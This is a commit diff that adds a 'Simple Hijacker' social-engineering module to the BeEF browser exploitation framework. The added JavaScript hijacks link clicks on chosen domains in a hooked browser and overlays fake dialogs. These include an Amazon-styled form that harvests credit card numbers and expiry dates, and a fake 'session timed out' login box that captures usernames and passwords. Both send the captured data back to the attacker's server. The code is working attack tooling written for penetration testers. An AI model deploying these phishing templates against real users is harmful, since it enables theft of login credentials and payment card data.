Adding the Simple Hijacker module in social engineering (route clicks on some links to javascript code)

modules/social_engineering/simple_hijacker/command.js

@@ -0,0 +1,37 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+
+hijack = function(){
+    function send(answer){
+      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);	
+    }
+    <% target = @targets.split(',') %>   
+    $j('a').click(function(e) {
+      e.preventDefault();
+      if ($j(this).attr('href') != '')
+      { 
+        if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{			
+          <%= instance_variable_get("@#{@choosetmpl}") %>
+          beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
+        }
+      }
+    });
+}
+
+beef.execute(function() {
+	hijack();
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action');
+});

modules/social_engineering/simple_hijacker/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        simple_hijacker:
+            enable: true
+            category: "Social Engineering"
+            name: "Simple Hijacker"
+            description: "Hijack clicks on links to display what you want."
+            templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
+            authors: ["gallypette"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/simple_hijacker/module.rb

@@ -0,0 +1,50 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Simple_hijacker < BeEF::Core::Command
+
+  def self.options
+
+    config = BeEF::Core::Configuration.instance
+    @templates = config.get('beef.module.simple_hijacker.templates')
+
+    # Defines which domains to target
+    data = []
+    data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'})
+    
+    # We'll then list all templates available 
+    tmptpl = []
+    @templates.each{ |template|
+      tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
+        raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
+        file = File.open(tplpath, "r")
+        data.push({'name' => template, 'type' => 'hidden', 'value' => file.read})
+      tmptpl<<[ template]
+    }
+ 
+    data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"})
+      
+    return data
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    save({'answer' => @datastore['answer']})
+  end
+  
+end

modules/social_engineering/simple_hijacker/templates/amazon.js

@@ -0,0 +1,28 @@
+  beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+	$j(document).attr('title', $j(this).html());
+	document.body.scroll = 'no';
+	document.documentElement.style.overflow = 'hidden';
+	
+	collect = function(){
+	  answer = "";
+		$j(":input").each(function() {
+		  answer += " "+$j(this).attr("name")+":"+$j(this).val();
+		});
+		send(answer);
+	}
+	
+		// floating div
+	function writediv() {
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'hax');
+		sneakydiv.setAttribute('display', 'block');
+		sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;');
+		document.body.appendChild(sneakydiv);
+		sneakydiv.innerHTML= '<div style="margin:5px;">Your credit card details expired, please enter your new credit card credential to continue shopping- <br> <b>Changes made to your payment methods will not affect orders you have already placed. </b></div><table cellspacing=0 cellpadding=0 border=0 width="100%"><tbody><tr><td valign=bottom><b class=h1><nobr><a href="#" style="font-size: medium;font-family: verdana,arial,helvetica;color: #004B91;text-decoration: underline;cursor: auto">Your Account</a></nobr>&gt;</b><h1 class=h1 style="display: inline; color: #E47911; font-size: medium;font-family: verdana,arial;font-weight: bold"><b class=h1><nobr>Add a Credit or Debit Card</nobr></b></h1></td></table><div width="99%" style="border: 2px solid #DDDDCC; -webkit-border-radius: 10px;border-radius: 10px"><table width="100%" border=0 cellspacing=0 cellpadding=0 align=center><tbody><tr><td valign=middle width="20%" nowrap=nowrap height=28><font color="#660000"><b class=sans>&nbsp; Edit your payment method:</b></font></td><tr><td valign=middle width="100%" nowrap=nowrap><table><tbody><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Cardholder Name:</font></b></td><td><input name=name onchange="collect();" size=25 maxlength=60><br></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Exp. Date:</font></b></td><td><select onchange="collect();" name=newCreditCardMonth title=Month id=newCreditCardMonth><option value=01>01<option value=02>02<option value=03>03<option value=04>04<option value=05>05<option value=06>06<option value=07>07<option value=08>08<option value=09>09<option value=10>10<option value=11 selected>11<option value=12>12</select>&nbsp;<select onchange="collect();" name=newCreditCardYear title=Year id=newCreditCardYear><option value=2011 selected>2011<option value=2012>2012<option value=2013>2013<option value=2014>2014<option value=2015>2015<option value=2016>2016<option value=2017>2017<option value=2018>2018<option value=2019>2019<option value=2020>2020<option value=2021>2021<option value=2022>2022<option value=2023>2023<option value=2024>2024<option value=2025>2025<option value=2026>2026<option value=2027>2027<option value=2028>2028<option value=2029>2029<option value=2030>2030<option value=2031>2031<option value=2032>2032<option value=2033>2033<option value=2034>2034<option value=2035>2035<option value=2036>2036<option value=2037>2037</select></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Number:</font></b></td><td><input name=creditcard onchange="collect();" size=16 maxlength=16><br></td><tr><td colspan=2><hr width="100%" noshade=noshade size=1></td><tr><td align=right></td><td><div id="confirm" style="cursor: hand; border: 2px solid #ffcc55; -webkit-border-radius: 10px;border-radius: 10px;font-family: verdana,arial;font-weight: bold" align=center width="20%"><font face="verdana,arial,helvetica" size=-1>Confirm</font></div></td></table></td></table></div>';
+	}
+
+	writediv();
+	
+	$j("#confirm").click(function () {
+      $j('#hax').remove();
+  });

modules/social_engineering/simple_hijacker/templates/confirmbox.js

@@ -0,0 +1,10 @@
+var answer = confirm("Do you really want to leave us ??")
+if (answer){
+	alert("Okay :(")
+	send("User chose to leave.");
+	window.location = $j(this).attr('href');
+}
+else{
+	alert("Okay enjoy ")
+	send("User chose to stay.");
+}

modules/social_engineering/simple_hijacker/templates/credential.js

@@ -0,0 +1,105 @@
+	imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
+	var answer= '';
+	
+	beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+	$j(document).attr('title', $j(this).html());
+	document.body.scroll = 'no';
+	document.documentElement.style.overflow = 'hidden';
+	
+	// set up darkening
+	function grayOut(vis, options) {
+	  // Pass true to gray out screen, false to ungray
+	  // options are optional.  This is a JSON object with the following (optional) properties
+	  // opacity:0-100         // Lower number = less grayout higher = more of a blackout 
+	  // zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+	  // bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+	  // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
+	  // Because options is JSON opacity/zindex/bgcolor are all optional and can appear
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || 50;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	}
+
+	// function to send response
+	function win(){
+		document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
+		answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
+	}
+
+	// perform darkening
+	grayOut(true);
+
+	function checker(){
+		processval = document.body.lastChild.getElementsByTagName("input")[2].value;
+		if (processval == "Processing..") {
+			uname = document.body.lastChild.getElementsByTagName("input")[0].value;
+			pass = document.body.lastChild.getElementsByTagName("input")[1].value;
+			answer = uname+":"+pass
+  		send(answer);
+			// set lastchild invisible
+			document.body.lastChild.setAttribute('style','display:none');
+			// lighten screen
+			grayOut(false);
+			clearInterval(credgrabber);
+			$j('#hax').remove();
+			$j('#darkenScreenObject').remove();
+		}
+	}
+
+
+	// floating div
+	function writeit() {
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'hax');
+		sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
+		sneakydiv.setAttribute('align', 'center');
+		document.body.appendChild(sneakydiv);
+		sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>';
+		credgrabber = setInterval(checker,1000);
+
+	}
+	
+	writeit();